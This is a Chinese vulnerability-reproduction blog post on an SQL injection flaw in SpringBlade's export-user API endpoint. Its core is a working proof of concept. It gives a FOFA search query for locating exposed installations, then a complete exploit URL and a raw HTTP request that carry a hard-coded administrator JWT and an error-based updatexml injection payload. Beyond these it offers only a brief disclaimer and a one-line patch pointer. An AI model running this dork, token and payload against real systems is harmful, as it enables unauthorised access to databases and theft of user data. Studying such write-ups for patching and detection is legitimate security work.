【漏洞复现】SpringBlade export-user接口SQL注入漏洞

  • 开发
  • 30

文章目录

前言

SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、SpringBlade系统简介

SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.5 、Spring Cloud 2020 等核心技术构建,完全遵循阿里巴巴编码规范。

二、漏洞描述

SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。SpringBlade export-user接口存在SQL注入漏洞。

三、影响版本

SpringBlade
在这里插入图片描述

四、漏洞复现

FOFA:body="https://bladex.vip"

漏洞链接:

http://127.0.0.1/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

漏洞数据包:

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1

在这里插入图片描述

五、修复建议

厂商已发布了漏洞修复程序 请及时关注更新:https://github.com/chillzhuang/blade-tool

阅读全部

相关推荐

  8. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-01-24 17:34:04       22 阅读

  9. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-01-24 17:34:04       13 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-24 17:34:04       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-24 17:34:04       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-24 17:34:04       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-24 17:34:04       20 阅读

热门阅读

  2. [go] 生成器模式

    2024-01-24 17:34:04       35 阅读

  3. Apache Spark中的广播变量分发机制

    2024-01-24 17:34:04       29 阅读

  4. ChatGPT目前的AI一哥

    2024-01-24 17:34:04       33 阅读

  12. ThreadLocal

    2024-01-24 17:34:04       37 阅读

  13. 改变图片颜色

    2024-01-24 17:34:04       36 阅读

  18. 牛客周赛26

    2024-01-24 17:34:04       36 阅读

  23. orchestrator介绍3.4 web API 的使用

    2024-01-24 17:34:04       37 阅读

  28. DNS解析是什么?DNS解析在网络通信中作用有哪些?

    2024-01-24 17:34:04       40 阅读

  30. 7.docker进阶

    2024-01-24 17:34:04       27 阅读